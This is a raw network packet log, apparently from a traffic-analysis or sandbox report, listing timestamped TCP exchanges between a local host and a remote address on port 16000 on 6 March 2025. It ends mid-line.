                                                                            Mar 6, 2025 08:09:12.646236897 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.646392107 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.646404028 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.646418095 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.646429062 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.646434069 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.646441936 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.646455050 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.646459103 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.646487951 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.646518946 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.646532059 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.646543980 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.646553040 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.646558046 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.646584988 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.659873962 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.659893990 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.659905910 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.659915924 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.659917116 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.659929037 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.659940004 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.659940958 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.659950972 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.659965038 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.659971952 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.659991026 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.659996986 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660007954 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660018921 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660047054 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.660048962 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660089016 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.660105944 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660118103 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660130978 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660151958 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.660175085 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.660196066 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660207987 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660238981 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660250902 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660252094 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.660290956 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.660347939 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660360098 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660371065 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660382032 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660412073 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.660430908 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660435915 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.660535097 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660546064 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660558939 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660584927 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660587072 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.660597086 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660608053 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660613060 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.660619974 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660638094 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.660679102 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.660701990 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660715103 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660726070 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660737991 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660757065 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.660773039 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.660789013 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660800934 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660836935 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.660947084 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660958052 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660969973 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660981894 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.660994053 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661001921 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.661004066 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661015987 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.661015987 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661026955 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661039114 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661048889 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.661067009 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.661077023 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661118984 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.661196947 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661207914 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661218882 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661230087 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661242008 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661243916 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.661252022 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661264896 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661273956 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.661276102 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661293030 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.661312103 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.661379099 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661474943 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661494970 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661506891 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661518097 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661521912 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.661530018 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661540031 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661551952 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661562920 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661564112 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.661575079 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661581039 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661583900 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.661592007 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661600113 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.661602020 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661612988 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661621094 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.661638021 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.661652088 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.661803007 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661815882 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661859989 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.661967039 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661978006 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.661988974 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.662009001 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.662009954 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.662019968 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.662031889 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.662044048 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.662045956 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.662050962 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.662055969 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.662067890 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.662080050 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.662091017 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.662101984 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.662113905 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.662126064 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.662137985 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.662149906 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.662162066 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.662162066 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.662162066 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.662162066 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.662195921 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.662412882 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.662434101 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.662446976 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.662455082 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.662458897 CET16